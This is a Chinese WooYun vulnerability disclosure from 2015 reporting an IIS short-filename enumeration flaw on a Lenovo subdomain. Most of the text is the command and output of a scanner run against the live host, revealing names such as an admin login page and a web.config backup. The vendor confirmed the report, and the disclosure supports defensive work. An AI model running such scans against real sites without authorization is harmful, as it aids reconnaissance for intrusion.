当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0104562

漏洞标题:中国联想某站IIS短目录枚举漏洞

相关厂商:联想

漏洞作者: 路人甲

提交时间:2015-03-31 12:03

修复时间:2015-05-17 14:22

公开时间:2015-05-17 14:22

漏洞类型:应用配置错误

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-03-31: 细节已通知厂商并且等待厂商处理中
2015-04-02: 厂商已经确认,细节仅向厂商公开
2015-04-12: 细节向核心白帽子及相关领域专家公开
2015-04-22: 细节向普通白帽子公开
2015-05-02: 细节向实习白帽子公开
2015-05-17: 细节向公众公开

简要描述:

中午饿了,来一发。

详细说明:

QQ截图20150329124506.png


QQ截图20150329124523.png


QQ截图20150329124617.png

漏洞证明:

Microsoft Windows [版本 6.1.7601]
版权所有 (c) 2009 Microsoft Corporation。保留所有权利。
C:\Users\Administrator>cd c:/python27
c:\Python27>iis_shortname_Scan.py http://dlxtag.lenovo.com/
server is vulerable, please wait, scanning...
Found /b**** [scan in progress]
Found /d**** [scan in progress]
Found /i**** [scan in progress]
Found /g**** [scan in progress]
Found /c**** [scan in progress]
Found /a**** [scan in progress]
Found /f**** [scan in progress]
Found /l**** [scan in progress]
Found /t**** [scan in progress]
Found /p**** [scan in progress]
Found /m**** [scan in progress]
Found /w**** [scan in progress]
Found /0**** [scan in progress]
Found /2**** [scan in progress]
Found /ba**** [scan in progress]
Found /de**** [scan in progress]
Found /dy**** [scan in progress]
Found /im**** [scan in progress]
Found /in**** [scan in progress]
Found /gl**** [scan in progress]
Found /ch**** [scan in progress]
Found /ad**** [scan in progress]
Found /as**** [scan in progress]
Found /av**** [scan in progress]
Found /fr**** [scan in progress]
Found /lo**** [scan in progress]
Found /th**** [scan in progress]
Found /pr**** [scan in progress]
Found /me**** [scan in progress]
Found /we**** [scan in progress]
Found /06**** [scan in progress]
Found /20**** [scan in progress]
Found /bas**** [scan in progress]
Found /def**** [scan in progress]
Found /dyd**** [scan in progress]
Found /ima**** [scan in progress]
Found /ind**** [scan in progress]
Found /glo**** [scan in progress]
Found /cha**** [scan in progress]
Found /adm**** [scan in progress]
Found /asp**** [scan in progress]
Found /ass**** [scan in progress]
Found /ava**** [scan in progress]
Found /frm**** [scan in progress]
Found /log**** [scan in progress]
Found /thr**** [scan in progress]
Found /prc**** [scan in progress]
Found /mem**** [scan in progress]
Found /web**** [scan in progress]
Found /06s**** [scan in progress]
Found /201**** [scan in progress]
Found /base**** [scan in progress]
Found /defa**** [scan in progress]
Found /dyde**** [scan in progress]
Found /imag**** [scan in progress]
Found /inde**** [scan in progress]
Found /glob**** [scan in progress]
Found /chan**** [scan in progress]
Found /admi**** [scan in progress]
Found /aspn**** [scan in progress]
Found /asse**** [scan in progress]
Found /avai**** [scan in progress]
Found /frmg**** [scan in progress]
Found /logo**** [scan in progress]
Found /thre**** [scan in progress]
Found /prcc**** [scan in progress]
Found /memb**** [scan in progress]
Found /webc**** [scan in progress]
Found /06se**** [scan in progress]
Found /2013**** [scan in progress]
Found /2014**** [scan in progress]
Found /basep**** [scan in progress]
Found /defau**** [scan in progress]
Found /dydef**** [scan in progress]
Found /image**** [scan in progress]
Found /index**** [scan in progress]
Found /globa**** [scan in progress]
Found /chang**** [scan in progress]
Found /admin**** [scan in progress]
Found /aspne**** [scan in progress]
Found /assem**** [scan in progress]
Found /avail**** [scan in progress]
Found /frmge**** [scan in progress]
Found /logon**** [scan in progress]
Found /three**** [scan in progress]
Found /prccs**** [scan in progress]
Found /membe**** [scan in progress]
Found /webco**** [scan in progress]
Found /06sel**** [scan in progress]
Found /2013-**** [scan in progress]
Found /2014-**** [scan in progress]
Found /basepa**** [scan in progress]
Found /defaul**** [scan in progress]
Found /dydefa**** [scan in progress]
Found /imagea**** [scan in progress]
Found /indexc**** [scan in progress]
Found /global**** [scan in progress]
Found /change**** [scan in progress]
Found /adminb**** [scan in progress]
Found /adminl**** [scan in progress]
Found /aspnet**** [scan in progress]
Found /assemb**** [scan in progress]
Found /availa**** [scan in progress]
Found /frmget**** [scan in progress]
Found /logona**** [scan in progress]
Found /threes**** [scan in progress]
Found /prccsp**** [scan in progress]
Found /member**** [scan in progress]
Found /webcon**** [scan in progress]
Found /06sell**** [scan in progress]
Found /2013-0**** [scan in progress]
Found /2014-4**** [scan in progress]
Found /basepa*c** [scan in progress]
Found /basepa*s** [scan in progress]
Found /defaul*a** [scan in progress]
Found /defaul*c** [scan in progress]
Found /defaul*e** [scan in progress]
Found /defaul*p** [scan in progress]
Found /defaul*r** [scan in progress]
Found /defaul*s** [scan in progress]
Found /dydefa*a** [scan in progress]
Found /dydefa*p** [scan in progress]
Found /dydefa*s** [scan in progress]
Found /imagea*c** [scan in progress]
Found /imagea*e** [scan in progress]
Found /imagea*r** [scan in progress]
Found /imagea*s** [scan in progress]
Found /indexc*h** [scan in progress]
Found /indexc*m** [scan in progress]
Found /indexc*t** [scan in progress]
Found /global*c** [scan in progress]
Found /global*a** [scan in progress]
Found /global*e** [scan in progress]
Found /global*r** [scan in progress]
Found /global*s** [scan in progress]
Found /change*a** [scan in progress]
Found /change*c** [scan in progress]
Found /change*e** [scan in progress]
Found /change*p** [scan in progress]
Found /change*r** [scan in progress]
Found /change*s** [scan in progress]
Found /adminb*c** [scan in progress]
Found /adminb*s** [scan in progress]
Found /adminl*a** [scan in progress]
Found /adminl*c** [scan in progress]
Found /adminl*e** [scan in progress]
Found /adminl*p** [scan in progress]
Found /adminl*s** [scan in progress]
Found /adminl*r** [scan in progress]
Found /aspnet [scan in progress]
Found Dir /aspnet~1 [Done]
Found /assemb*c** [scan in progress]
Found /assemb*s** [scan in progress]
Found /availa*a** [scan in progress]
Found /availa*c** [scan in progress]
Found /availa*i** [scan in progress]
Found /availa*n** [scan in progress]
Found /availa*p** [scan in progress]
Found /availa*s** [scan in progress]
Found /frmget*a** [scan in progress]
Found /frmget*c** [scan in progress]
Found /frmget*e** [scan in progress]
Found /frmget*p** [scan in progress]
Found /frmget*s** [scan in progress]
Found /frmget*r** [scan in progress]
Found /logona*c** [scan in progress]
Found /logona*e** [scan in progress]
Found /logona*r** [scan in progress]
Found /logona*s** [scan in progress]
Found /threes*e** [scan in progress]
Found /threes*a** [scan in progress]
Found /threes*c** [scan in progress]
Found /threes*p** [scan in progress]
Found /threes*r** [scan in progress]
Found /threes*s** [scan in progress]
Found /prccsp*b** [scan in progress]
Found /prccsp*e** [scan in progress]
Found /prccsp*p** [scan in progress]
Found /prccsp*s** [scan in progress]
Found /prccsp*v** [scan in progress]
Found /prccsp*w** [scan in progress]
Found /member*a** [scan in progress]
Found /member*c** [scan in progress]
Found /member*p** [scan in progress]
Found /member*s** [scan in progress]
Found /webcon*a** [scan in progress]
Found /webcon*b** [scan in progress]
Found /webcon*k** [scan in progress]
Found /06sell [scan in progress]
Found Dir /06sell~1 [Done]
Found /2013-0*c** [scan in progress]
Found /2013-0*n** [scan in progress]
Found /2013-0*o** [scan in progress]
Found /2014-4*c** [scan in progress]
Found /2014-4*o** [scan in progress]
Found /2014-4*n** [scan in progress]
Found /basepa*cs* [scan in progress]
Found /defaul*as* [scan in progress]
Found /defaul*cs* [scan in progress]
Found /defaul*es* [scan in progress]
Found /defaul*re* [scan in progress]
Found /defaul*sp* [scan in progress]
Found /dydefa*as* [scan in progress]
Found /dydefa*sp* [scan in progress]
Found /imagea*cs* [scan in progress]
Found /imagea*es* [scan in progress]
Found /imagea*re* [scan in progress]
Found /indexc*ht* [scan in progress]
Found /indexc*tm* [scan in progress]
Found /global*cs* [scan in progress]
Found /global*as* [scan in progress]
Found /global*es* [scan in progress]
Found /global*re* [scan in progress]
Found /global*sa* [scan in progress]
Found /change*as* [scan in progress]
Found /change*cs* [scan in progress]
Found /change*es* [scan in progress]
Found /change*re* [scan in progress]
Found /change*sp* [scan in progress]
Found /adminb*cs* [scan in progress]
Found /adminl*as* [scan in progress]
Found /adminl*cs* [scan in progress]
Found /adminl*es* [scan in progress]
Found /adminl*sp* [scan in progress]
Found /adminl*re* [scan in progress]
Found /assemb*cs* [scan in progress]
Found /availa*as* [scan in progress]
Found /availa*in* [scan in progress]
Found /availa*nc* [scan in progress]
Found /availa*sp* [scan in progress]
Found /frmget*as* [scan in progress]
Found /frmget*cs* [scan in progress]
Found /frmget*es* [scan in progress]
Found /frmget*sp* [scan in progress]
Found /frmget*re* [scan in progress]
Found /logona*cs* [scan in progress]
Found /logona*es* [scan in progress]
Found /logona*re* [scan in progress]
Found /threes*es* [scan in progress]
Found /threes*as* [scan in progress]
Found /threes*cs* [scan in progress]
Found /threes*re* [scan in progress]
Found /threes*sp* [scan in progress]
Found /prccsp*eb* [scan in progress]
Found /prccsp*sp* [scan in progress]
Found /prccsp*vs* [scan in progress]
Found /prccsp*we* [scan in progress]
Found /member*as* [scan in progress]
Found /member*cs* [scan in progress]
Found /member*sp* [scan in progress]
Found /webcon*ak* [scan in progress]
Found /webcon*ba* [scan in progress]
Found /2013-0*co* [scan in progress]
Found /2013-0*on* [scan in progress]
Found /2014-4*co* [scan in progress]
Found /2014-4*on* [scan in progress]
Found /defaul*asp [scan in progress]
Found File /defaul~1.asp [Done]
Found /defaul*res [scan in progress]
Found File /defaul~1.res [Done]
Found /dydefa*asp [scan in progress]
Found File /dydefa~1.asp [Done]
Found /imagea*res [scan in progress]
Found File /imagea~1.res [Done]
Found /indexc*htm [scan in progress]
Found File /indexc~1.htm [Done]
Found /global*asa [scan in progress]
Found File /global~1.asa [Done]
Found /global*res [scan in progress]
Found File /global~1.res [Done]
Found /change*asp [scan in progress]
Found File /change~1.asp [Done]
Found /change*res [scan in progress]
Found File /change~1.res [Done]
Found /adminl*asp [scan in progress]
Found File /adminl~1.asp [Done]
Found /adminl*res [scan in progress]
Found File /adminl~1.res [Done]
Found /availa*asp [scan in progress]
Found File /availa~1.asp [Done]
Found /availa*inc [scan in progress]
Found File /availa~1.inc [Done]
Found /frmget*asp [scan in progress]
Found File /frmget~1.asp [Done]
Found /frmget*res [scan in progress]
Found File /frmget~1.res [Done]
Found /logona*res [scan in progress]
Found File /logona~1.res [Done]
Found /threes*asp [scan in progress]
Found File /threes~1.asp [Done]
Found /threes*res [scan in progress]
Found File /threes~1.res [Done]
Found /prccsp*vsp [scan in progress]
Found File /prccsp~1.vsp [Done]
Found /prccsp*web [scan in progress]
Found File /prccsp~1.web [Done]
Found /member*asp [scan in progress]
Found File /member~1.asp [Done]
Found /webcon*bak [scan in progress]
Found File /webcon~1.bak [Done]
Found /2013-0*con [scan in progress]
Found File /2013-0~1.con [Done]
Found /2014-4*con [scan in progress]
Found File /2014-4~1.con [Done]
----------------------------------------------------------------
Dir: /aspnet~1
Dir: /06sell~1
File: /defaul~1.asp
File: /defaul~1.res
File: /dydefa~1.asp
File: /imagea~1.res
File: /indexc~1.htm
File: /global~1.asa
File: /global~1.res
File: /change~1.asp
File: /change~1.res
File: /adminl~1.asp
File: /adminl~1.res
File: /availa~1.asp
File: /availa~1.inc
File: /frmget~1.asp
File: /frmget~1.res
File: /logona~1.res
File: /threes~1.asp
File: /threes~1.res
File: /prccsp~1.vsp
File: /prccsp~1.web
File: /member~1.asp
File: /webcon~1.bak
File: /2013-0~1.con
File: /2014-4~1.con
----------------------------------------------------------------
2 Directories, 24 Files found in toal

修复方案:

null

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2015-04-02 14:21

厂商回复:

感谢您对联想安全工作的支持

最新状态:

暂无